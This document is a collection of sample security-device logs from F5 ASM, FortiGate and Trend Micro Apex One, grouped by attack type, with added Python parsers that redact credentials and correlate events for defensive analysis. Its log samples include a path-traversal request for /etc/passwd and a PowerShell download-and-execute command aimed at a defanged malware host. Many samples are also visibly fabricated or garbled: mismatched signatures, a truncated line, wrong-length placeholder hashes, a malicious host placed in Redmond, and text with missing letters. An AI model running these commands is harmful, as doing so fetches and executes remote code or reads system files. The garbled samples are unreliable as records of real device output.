<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",management_ip_address="172.16.73.34",http_class_name="/Common/topaz4-web4",policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",violations="",support_id="18205860747014045701",request_status="blocked",response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",sig_ids="200021069",sig_names="Automated client access",date_time="2012-09-19 13:40:26",severity="High",attack_type="BOT",geo_location="N/A",ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_violations="",virus_name="N/A",uri="/",request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-gnu)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnection: Keep-Alive\r\n\r\n"

<131>Sep 19 13:53:34 bigip-4.pme-ds.f5.com ASM:CEF:0|F5|ASM|11.3.0|200021069|Automated client access "wget"|5|dvchost=bigip-4.pme-ds.f5.com dvc=172.16.73.34 cs1=topaz4-web4 cs1Label=policy_name cs2=/Common/topaz4-web4 cs2Label=http_class_name deviceCustomDate1=Sep 19 2012 13:49:25 deviceCustomDate1Label=policy_apply_date externalId=18205860747014045723 act=blocked cn1=403 cn1Label=response_code src=10.4.1.101 spt=52975 dst=10.4.1.200 dpt=80 requestMethod=GET app=HTTP cs5=N/A cs5Label=x_forwarded_for_header_value rt=Sep 19 2012 13:53:33 deviceExternalId=0 cs4=BOT cs4Label=attack_type cs6=N/A cs6Label=geo_location c6a1= c6a1Label=device_address c6a2= c6a2Label=source_address c6a3= c6a3Label=destination_address c6a4=N/A c6a4Label=ip_address_intelligence msg=N/A suid=86c4f8bf7349cac9 suser=N/A request=/ cs3Label=full_request cs3=GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-gn,uri="/",request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-gnu)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnection: Keep-Alive\r\n\r\n"

DDoS attack:

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",management_ip_address="172.16.73.34",http_class_name="/Common/topaz4-web4",policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",violations="",support_id="18205860747014045701",request_status="blocked",response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",sig_ids="200021069",sig_names="UDP Flood",date_time="2012-09-19 13:40:26",severity="High",attack_type="DDoS",geo_location="N/A",ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_violations="",virus_name="N/A",uri="/",request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-gnu)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnection: Keep-Alive\r\n\r\n"

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",management_ip_address="172.16.73.34",http_class_name="/Common/topaz4-web4",policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",violations="",support_id="18205860747014045701",request_status="blocked",response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",sig_ids="200021069",sig_names="SYN Flood",date_time="2012-09-19 13:40:26",severity="High",attack_type="DDoS",geo_location="N/A",ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_violations="",virus_name="N/A",uri="/",request="GET / HTTP/1.0\r\nUser-Agent: Wget/1.12 (linux-gnu)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnection: Keep-Alive\r\n\r\n"

Cross-Site Request Forgery attack in WAF:

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",management_ip_address="172.16.73.34",http_class_name="/Common/topaz4-web4",policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",violations="CSRF attack detected",support_id="18205860747014045701",request_status="blocked",response_code="403",ip_client="10.4.1.101",route_domain="0",method="POST",protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",sig_ids="200021069",sig_names="CSRF attack",date_time="2012-09-19 13:40:26",severity="High",attack_type="CSRF",geo_location="N/A",ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_violations="",virus_name="N/A",uri="/login",request="POST /login HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://10.4.1.200/login\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: session_id=98630496c8413322\r\n\r\nusername=admin&password=password"

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",management_ip_address="172.16.73.34",http_class_name="/Common/topaz4-web4",policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",violations="CSRF token validation failed",support_id="18205860747014045701",request_status="blocked",response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",sig_ids="200021069",sig_names="CSRF token validation",date_time="2012-09-19 13:40:26",severity="High",attack_type="CSRF",geo_location="N/A",ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_violations="",virus_name="N/A",uri="/transfer",request="GET /transfer HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://10.4.1.200/transfer\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: session_id=98630496c8413322\r\n\r\n"

File inclusion attack:

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",management_ip_address="172.16.73.34",http_class_name="/Common/topaz4-web4",policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",violations="File Inclusion Attack Detected",support_id="18205860747014045701",request_status="blocked",response_code="403",ip_client="10.4.1.101",route_domain="0",method="GET",protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",sig_ids="200021069",sig_names="File Inclusion Attack",date_time="2012-09-19 13:40:26",severity="High",attack_type="File Inclusion",geo_location="N/A",ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_violations="",virus_name="N/A",uri="/index.php?page=../../../etc/passwd",request="GET /index.php?page=../../../etc/passwd HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://10.4.1.200/index.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: session_id=98630496c8413322\r\n\r\n"

Web defacement attack:

<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",management_ip_address="172.16.73.34",http_class_name="/Common/topaz4-web4",policy_name="topaz4-web4",policy_apply_date="2012-09-19 11:38:36",violations="",support_id="18205860747014045701",request_status="passed",response_code="200",ip_client="10.4.1.101",route_domain="0",method="GET",protocol="HTTP",query_string="",x_forwarded_for_header_value="N/A",sig_ids="",sig_names="",date_time="2012-09-19 13:40:26",severity="Informational",attack_type="",geo_location="N/A",ip_address_intelligence="N/A",username="N/A",session_id="98630496c8413322",src_port="52964",dest_port="80",dest_ip="10.4.1.200",sub_violations="",virus_name="N/A"u)\r\nAccept: */*\r\nHost: 10.4.1.200\r\nConnection: Keep-Alive\r\n\r\n
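
The entries from the bot attack onward are in the BIG-IP ASM remote-logging layout: a syslog PRI and header, then ASM: followed by comma-separated key="value" pairs, where the request field carries the whole HTTP request with CR/LF written as the two literal characters backslash-r backslash-n. Splitting on commas breaks on the first User-Agent value. The parser below is an added example, not F5 code: it matches quoted values with a regex that honours backslash escapes, decodes the syslog PRI into facility and severity, unfolds the request into method, path, headers and body, and aggregates blocked requests per client. It also redacts password-like form fields and the Cookie header before the request leaves the pipeline, because, as the CSRF entry above shows, a blocked request is logged in full, credentials and session cookie included. The two sample lines are constructed from the bot and CSRF entries with trimmed field sets.

```python
import re
from collections import defaultdict

# Constructed lines in the ASM key="value" layout, trimmed from the bot and
# CSRF entries above. Hostnames and addresses are the page's sample values.
SAMPLE_ASM = [
    '<134>Sep 19 13:40:27 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",'
    'policy_name="topaz4-web4",violations="",support_id="18205860747014045701",'
    'request_status="blocked",response_code="403",ip_client="10.4.1.101",method="GET",'
    'sig_ids="200021069",sig_names="Automated client access",severity="High",'
    'attack_type="BOT",dest_ip="10.4.1.200",uri="/",request="GET / HTTP/1.0\\r\\n'
    'User-Agent: Wget/1.12 (linux-gnu)\\r\\nAccept: */*\\r\\nHost: 10.4.1.200\\r\\n\\r\\n"',
    '<134>Sep 19 13:40:28 bigip-4.pme-ds.f5.com ASM:unit_hostname="bigip-4.pme-ds.f5.com",'
    'policy_name="topaz4-web4",violations="CSRF attack detected",'
    'support_id="18205860747014045702",request_status="blocked",response_code="403",'
    'ip_client="10.4.1.101",method="POST",sig_ids="",sig_names="",severity="High",'
    'attack_type="CSRF",dest_ip="10.4.1.200",uri="/login",session_id="98630496c8413322",'
    'request="POST /login HTTP/1.0\\r\\nHost: 10.4.1.200\\r\\n'
    'Content-Type: application/x-www-form-urlencoded\\r\\n'
    'Cookie: session_id=98630496c8413322\\r\\n\\r\\nusername=admin&password=password"',
]

SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d+)>(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) ASM:(?P<body>.*)$")
PAIR_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')   # quoted value, backslash escapes allowed
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news", "uucp",
              "cron", "authpriv", "ftp", "ntp", "security", "console", "solaris-cron",
              "local0", "local1", "local2", "local3", "local4", "local5", "local6", "local7"]
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
CRLF = "\\r\\n"                  # the escapes exactly as they appear in the log text
SENSITIVE_PARAM = re.compile(r"(?i)\b((?:pass(?:word|wd)?|pwd|token|secret)=)[^&\\]*")
COOKIE_HEADER = re.compile(r"(?i)(Cookie: )[^\\]*")


def parse_asm(line):
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError("not an ASM syslog line")
    pri = int(m["pri"])
    return {"syslog": (FACILITIES[pri // 8], SEVERITIES[pri % 8]),
            "timestamp": m["ts"], "host": m["host"],
            "fields": dict(PAIR_RE.findall(m["body"]))}


def parse_request(req):
    """Unfold the logged request into method, path, headers and body."""
    lines = req.split(CRLF)
    method, path, _version = lines[0].split(" ", 2)
    headers, i = {}, 1
    while i < len(lines) and lines[i]:
        name, _, value = lines[i].partition(":")
        headers[name.strip()] = value.strip()
        i += 1
    return {"method": method, "path": path, "headers": headers,
            "body": CRLF.join(lines[i + 1:])}


def redact_request(req):
    """Mask credentials and the session cookie before the event is forwarded."""
    req = SENSITIVE_PARAM.sub(r"\1[REDACTED]", req)
    return COOKIE_HEADER.sub(r"\1[REDACTED]", req)


def summarize(lines):
    """Per client: blocked count, attack types, and whether credentials were logged."""
    out = defaultdict(lambda: {"blocked": 0, "attack_types": set(), "credentials_logged": False})
    for ev in map(parse_asm, lines):
        f = ev["fields"]
        c = out[f.get("ip_client", "?")]
        if f.get("request_status") == "blocked":
            c["blocked"] += 1
        if f.get("attack_type"):
            c["attack_types"].add(f["attack_type"])
        if "request" in f and SENSITIVE_PARAM.search(parse_request(f["request"])["body"]):
            c["credentials_logged"] = True
    return dict(out)
```

The PRI of 134 on these lines decodes to local0.info; a collector that routes on syslog severity alone would file a blocked attack as informational, so route on the ASM severity field instead.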

E. Device type: FortiGate firewall

IP Spoofing:

date=2019-05-10 time=11:37:47 logid="0000000013" type="traffic" subtype="forward" level="notice" vd="vdom1" eventtime=1557513467369913239 srcip=10.1.100.11 srcport=58012 srcintf="port12" srcintfrole="undefined" dstip=23.59.154.35 dstport=80 dstintf="port11" dstintfrole="undefined" srcuuid="ae28f494-5735-51e9-f247-d1d2ce663f4b" dstuuid="test" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"

DoS:

2022-07-25 14:30:05 log_id=0123456789 type=traffic subtype=dos src_ip=192.168.1.100 src_port=12345 dst_ip=10.10.10.10 dst_port=80 proto=tcp action=block policy_id=1234567890 policy_type=user_defined

Port Scan:

2022-07-25 14:30:05 log_id=0123456789 type=traffic subtype=portscan src_ip=192.168.1.100 src_port=12345 dst_ip=10.10.10.10 dst_port=1-1024 proto=tcp action=block policy_id=1234567890 policy_type=user_defined

Login failure:

2022-07-25 14:30:05 log_id=0123456789 type=authentication subtype=failed src_ip=192.168.1.100 user_name=jdoe service=ssh reason=invalid_password
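
FortiGate writes one event per line as space-separated key=value pairs, quoting values that may contain spaces, with the timestamp either as separate date= and time= fields (the traffic entry above) or, in the shortened form the DoS, port scan and login entries use, at the start of the line. Individually none of those three entries is conclusive; a port scan followed within minutes by repeated SSH authentication failures from the same source is. The code below is an added example, not Fortinet code: it tokenises both timestamp styles into one record shape, then runs a sliding-window count of authentication failures per source and a recon-then-auth-failure rule over the events. The sample lines are constructed: the first entries mirror the samples above and the extra authentication failures are made up to exercise the rules.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: the first entries mirror the FortiGate samples above,
# the extra authentication failures are made up to exercise the rules.
SAMPLE_FGT = [
    'date=2019-05-10 time=11:37:47 logid="0000000013" type="traffic" subtype="forward" '
    'level="notice" vd="vdom1" srcip=10.1.100.11 srcport=58012 srcintf="port12" '
    'dstip=23.59.154.35 dstport=80 dstintf="port11" action="accept" policyid=1',
    '2022-07-25 14:30:05 log_id=0123456789 type=traffic subtype=portscan src_ip=192.168.1.100 '
    'src_port=12345 dst_ip=10.10.10.10 dst_port=1-1024 proto=tcp action=block policy_id=1234567890',
    '2022-07-25 14:30:06 log_id=0123456790 type=authentication subtype=failed '
    'src_ip=192.168.1.100 user_name=jdoe service=ssh reason=invalid_password',
    '2022-07-25 14:30:09 log_id=0123456791 type=authentication subtype=failed '
    'src_ip=192.168.1.100 user_name=root service=ssh reason=invalid_password',
    '2022-07-25 14:30:12 log_id=0123456792 type=authentication subtype=failed '
    'src_ip=192.168.1.100 user_name=admin service=ssh reason=invalid_password',
    '2022-07-25 14:31:00 log_id=0123456793 type=traffic subtype=dos src_ip=192.168.1.100 '
    'src_port=12345 dst_ip=10.10.10.10 dst_port=80 proto=tcp action=block policy_id=1234567890',
    '2022-07-25 14:45:00 log_id=0123456794 type=authentication subtype=failed '
    'src_ip=192.168.1.77 user_name=jdoe service=ssh reason=invalid_password',
]

LEADING_TS = re.compile(r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) (?P<rest>.*)$")
KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')   # quoted (escapes allowed) or bare value


def parse_fortigate(line):
    """One record per line; '_ts' is a datetime and '_src' the source address."""
    fields = {}
    m = LEADING_TS.match(line)
    if m:
        fields["date"], fields["time"], line = m["date"], m["time"], m["rest"]
    for key, value in KV.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    fields["_ts"] = datetime.strptime(f'{fields["date"]} {fields["time"]}', "%Y-%m-%d %H:%M:%S")
    fields["_src"] = fields.get("srcip") or fields.get("src_ip")
    return fields


def correlate(events, window=timedelta(minutes=10), failure_threshold=3):
    """Flag sources with >= failure_threshold auth failures inside `window`, and
    sources whose blocked scan/DoS is followed by an auth failure inside `window`."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["_src"]:
            by_src[ev["_src"]].append(ev)
    findings = []
    for src, evs in sorted(by_src.items()):
        evs.sort(key=lambda e: e["_ts"])
        failures = [e["_ts"] for e in evs
                    if e.get("type") == "authentication" and e.get("subtype") == "failed"]
        for i, start in enumerate(failures):          # sliding window over the failures
            count = sum(1 for t in failures[i:] if t - start <= window)
            if count >= failure_threshold:
                findings.append({"src": src, "rule": "auth_bruteforce",
                                 "count": count, "first": start})
                break
        recon = [e["_ts"] for e in evs if e.get("subtype") in ("portscan", "dos")]
        if any(timedelta(0) <= f - r <= window for r in recon for f in failures):
            findings.append({"src": src, "rule": "recon_then_auth_failure"})
    return findings
```

Tune the window and threshold to the service: three SSH failures in ten minutes from one address is a plausible human; the same from an address the firewall just blocked for scanning is not.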

Man-in-the-middle attack:

2022-07-25 14:30:05 UTC,192.168.1.1,10.0.0.1,TCP,80,6,12345,MitM,Score:95,Signature:MITM_SSL_STRIP,Client IP:192.168.1.100,Server IP:10.0.0.100,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:200 OK,URL:http://example.com/login

2022-07-25 14:30:10 UTC,192.168.1.1,10.0.0.1,TCP,443,6,12346,MitM,Score:90,Signature:MITM_SSL_RENEGOTIATION,Client IP:192.168.1.101,Server IP:10.0.0.101,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:200 OK,URL:https://example.com/login

2022-07-25 14:30:15 UTC,192.168.1.1,10.0.0.1,TCP,80,6,12347,MitM,Score:85,Signature:MITM_SSL_CERTIFICATE_FORGERY,Client IP:192.168.1.102,Server IP:10.0.0.102,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:200 OK,URL:http://example.com/login

2022-07-25 14:30:20 UTC,192.168.1.1,10.0.0.1,TCP,443,6,12348,MitM,Score:95,Signature:MITM_SSL_SESSION_HIJACKING,Client IP:192.168.1.103,Server IP:10.0.0.103,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:200 OK,URL:https://example.com/login

Trend Micro Apex One TM:


Ransomware a ack:
Event Time: 2023-03-14 10:30:15
Device Name: WIN-1234567890
User Name: john.doe
Event Category: Ransomware
Event Level: High
Source: Trend Micro Apex One

Descrip on:
Trend Micro Apex One detected and blocked a ransomware a ack on device WIN-1234567890,
which was ini ated by user john.doe. The ransomware variant detected was iden fied as "STOP
Djvu".

Addi onal Details:


- File Name: C:\Users\john.doe\Downloads\document.pdf.exe
- File Path: C:\Users\john.doe\Downloads\
- File Size: 123456 bytes
- File SHA256 Hash: 0123456789abcdef0123456789abcdef
- File MD5 Hash: 1234567890abcdef1234567890abcdef
- File Crea on Time: 2023-03-14 10:29:55
- File Modifica on Time: 2023-03-14 10:29:55
- File Access Time: 2023-03-14 10:30:14
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 1234
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Crea on Time: 2023-03-14 10:30:14
- Process Modifica on Time: 2023-03-14 10:30:14
- Process Access Time: 2023-03-14 10:30:14
- User Domain: contoso.com

14
- User Logon ID: (0x0,0x3E7)
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connec on: 192.168.1.100:1234 -> 192.168.1.200:445
- Network Protocol: TCP
- Network Bytes Sent: 1234
- Network Bytes Received: 5678
- Network Timestamp: 2023-03-14 10:30:15
- Network Dura on: 00:00:01
- Network Bandwidth: 18 KB/s
- Network Packet Count: 10
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED
- Network Direc on: OUTBOUND
- Network Ini ated By: Applica on
- Network Applica on: C:\Windows\System32\svchost.exe
- Network Port: 1234
- Network Des na on IP: 192.168.1.200
- Network Des na on Port: 445
- Network Des na on Zone: Internal
- Network Des na on Country: United States
- Network Des na on City: Redmond
- Network Des na on Organiza on: Microso Corpora on
- Network Des na on Domain: microso .com
- Network Des na on URL: N/A
- Network Des na on File: N/A
- Network Des na on Hash: N/A
- Network Des na on Reputa on: Unknown
- Network Des na on Threat: Unknown
- Network Des na on Malware: Unknown
- Network Des na on Phishing: Unknown
- Network Des na on Spam: Unknown

15
- Network Des na on Scam: Unknown
- Network Des na on Category: N/A

APT A ack:
Event Time: 2023-03-14 14:45:00
Device Name: WIN-1234567890
User Name: john.doe
Event Category: APT
Event Level: High
Source: Trend Micro Apex One

Descrip on:
Trend Micro Apex One detected and blocked an APT a ack on device WIN-1234567890, which was
ini ated by user john.doe. The APT group associated with this a ack was iden fied as "Threat
Actor X".

Addi onal Details:


- File Name: C:\Windows\Temp\net.exe
- File Path: C:\Windows\Temp\
- File Size: 234567 bytes
- File SHA256 Hash: 9876543210abcdef9876543210abcdef
- File MD5 Hash: 8765432190abcdef8765432190abcdef
- File Crea on Time: 2023-03-14 14:44:45
- File Modifica on Time: 2023-03-14 14:44:45
- File Access Time: 2023-03-14 14:44:45
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 4321
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Crea on Time: 2023-03-14 14:44:45
- Process Modifica on Time: 2023-03-14 14:44:45
- Process Access Time: 2023-03-14 14:44:45
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)

16
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connec on: 192.168.1.100:1234 -> 192.168.1.200:445
- Network Protocol: TCP
- Network Bytes Sent: 2345
- Network Bytes Received: 6789
- Network Timestamp: 2023-03-14 14:44:45
- Network Dura on: 00:00:01
- Network Bandwidth: 30 KB/s
- Network Packet Count: 15
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED
- Network Direc on: OUTBOUND
- Network Ini ated By: Applica on
- Network Applica on: C:\Windows\System32\svchost.exe
- Network Port: 1234
- Network Des na on IP: 192.168.1.200
- Network Des na on Port: 445
- Network Des na on Zone: Internal
- Network Des na on Country: United States
- Network Des na on City: Redmond
- Network Des na on Organiza on: Microso Corpora on
- Network Des na on Domain: microso .com
- Network Des na on URL: N/A
- Network Des na on File: N/A
- Network Des na on Hash: N/A
- Network Des na on Reputa on: Unknown
- Network Des na on Threat: Unknown
- Network Des na on Malware: Unknown
- Network Des na on Phishing: Unknown
- Network Des na on Spam: Unknown
- Network Des na on Scam: Unknown

17
- Network Des na on Category: N/A
- APT Group: Threat Actor X
- APT Campaign: Opera on Red

Crypto jacking A ack:


Event Time: 2023-03-15 10:15:00
Device Name: WIN-1234567890
User Name: jane.doe
Event Category: Cryptojacking
Event Level: High
Source: Trend Micro Apex One

Description:
Trend Micro Apex One detected and blocked a cryptojacking attack on device WIN-1234567890,
which was initiated by user jane.doe. The cryptojacking malware was identified as "CoinMiner".

Additional Details:


- File Name: C:\Users\jane.doe\AppData\Local\Temp\miner.exe
- File Path: C:\Users\jane.doe\AppData\Local\Temp\
- File Size: 56789 bytes
- File SHA256 Hash: 3456789012abcdef3456789012abcdef
- File MD5 Hash: 2345678901abcdef2345678901abcdef
- File Creation Time: 2023-03-15 10:14:55
- File Modification Time: 2023-03-15 10:14:55
- File Access Time: 2023-03-15 10:14:55
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 5678
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Creation Time: 2023-03-15 10:14:55
- Process Modification Time: 2023-03-15 10:14:55
- Process Access Time: 2023-03-15 10:14:55
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connection: 192.168.1.100:1234 -> 192.168.1.200:3333
- Network Protocol: TCP
- Network Bytes Sent: 1234
- Network Bytes Received: 5678
- Network Timestamp: 2023-03-15 10:14:55
- Network Duration: 00:00:01
- Network Bandwidth: 20 KB/s
- Network Packet Count: 10
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED
- Network Direction: OUTBOUND
- Network Initiated By: Application
- Network Application: C:\Windows\System32\svchost.exe
- Network Port: 3333
- Network Destination IP: 192.168.1.200
- Network Destination Port: 3333
- Network Destination Zone: Internal
- Network Destination Country: United States
- Network Destination City: Redmond
- Network Destination Organization: Microsoft Corporation
- Network Destination Domain: microsoft.com
- Network Destination URL: pool.miner.com:3333
- Network Destination File: N/A
- Network Destination Hash: N/A
- Network Destination Reputation: Malicious
- Network Destination Threat: Cryptojacking
- Network Destination Malware: CoinMiner
- Network Destination Phishing: Unknown
- Network Destination Spam: Unknown
- Network Destination Scam: Unknown
- Network Destination Category: Malicious
- Cryptojacking Algorithm: SHA-256
- Cryptojacking Currency: Bitcoin
- Cryptojacking Pool: pool.miner.com:3333
- Cryptojacking Wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa

Rootkits:
Event Time: 2023-03-16 12:30:00
Device Name: WIN-1234567890
User Name: admin
Event Category: Rootkit
Event Level: Critical
Source: Trend Micro Apex One

Description:
Trend Micro Apex One detected and blocked a rootkit attack on device WIN-1234567890, which
was initiated by user admin. The rootkit malware was identified as "ZeroAccess".

Additional Details:


- File Name: C:\Windows\System32\drivers\mrxsmb.sys
- File Path: C:\Windows\System32\drivers\
- File Size: 234567 bytes
- File SHA256 Hash: 1234567890abcdef1234567890abcdef
- File MD5 Hash: 9876543210abcdef9876543210abcdef
- File Creation Time: 2023-03-16 12:29:55
- File Modification Time: 2023-03-16 12:29:55
- File Access Time: 2023-03-16 12:29:55
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 1234
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Creation Time: 2023-03-16 12:29:55
- Process Modification Time: 2023-03-16 12:29:55
- Process Access Time: 2023-03-16 12:29:55
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- System Call: NtCreateFile
- System Call Result: 0xC0000022 (STATUS_ACCESS_DENIED)
- System Call Timestamp: 2023-03-16 12:29:55
- System Call Process ID: 1234
- System Call Thread ID: 4567
- Rootkit Behavior: Manipulating kernel objects to hide malicious activity
- Rootkit Technique: Direct Kernel Object Manipulation (DKOM)
- Rootkit Component: Driver
- Rootkit Family: ZeroAccess
- Rootkit Category: Rootkit
- Rootkit Severity: High
- Rootkit Confidence: 90
- Rootkit Recommendation: Quarantine and remove the malicious driver

Fileless Attack:
Event Time: 2023-03-17 14:45:00
Device Name: WIN-1234567890
User Name: john.doe
Event Category: Fileless
Event Level: High
Source: Trend Micro Apex One

Description:
Trend Micro Apex One detected and blocked a fileless attack on device WIN-1234567890, which
was initiated by user john.doe. The attack used PowerShell to download and execute a malicious
script.

Additional Details:


- Attack Type: Fileless
- Attack Technique: PowerShell Script
- Attack Vector: Download and execute
- Attack Payload: Malicious PowerShell script
- Attack Source: hxxp://malware[.]com/powershell.ps1
- Attack Destination: C:\Windows\Temp\
- Attack File Name: powershell.ps1
- Attack File Size: 12345 bytes
- Attack File SHA256 Hash: 1234567890abcdef1234567890abcdef
- Attack File MD5 Hash: 9876543210abcdef9876543210abcdef
- Attack File Creation Time: 2023-03-17 14:44:55
- Attack File Modification Time: 2023-03-17 14:44:55
- Attack File Access Time: 2023-03-17 14:44:55
- Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- Process ID: 5678
- Process Command Line: powershell.exe -noprofile -command "IEX (New-Object Net.WebClient).DownloadString('hxxp://malware[.]com/powershell.ps1')"
- Process Creation Time: 2023-03-17 14:44:55
- Process Modification Time: 2023-03-17 14:44:55
- Process Access Time: 2023-03-17 14:44:55
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connection: 192.168.1.100:1234 -> hxxp://malware[.]com:80
- Network Protocol: HTTP
- Network Bytes Sent: 1234
- Network Bytes Received: 5678
- Network Timestamp: 2023-03-17 14:44:55
- Network Duration: 00:00:01
- Network Bandwidth: 20 KB/s
- Network Packet Count: 10
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED
- Network Direction: OUTBOUND
- Network Initiated By: Application
- Network Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- Network Port: 80
- Network Destination IP: hxxp://malware[.]com
- Network Destination Port: 80
- Network Destination Zone: Internet
- Network Destination Country: United States
- Network Destination City: Redmond
- Network Destination Organization: Microsoft Corporation
- Network Destination Domain: microsoft.com
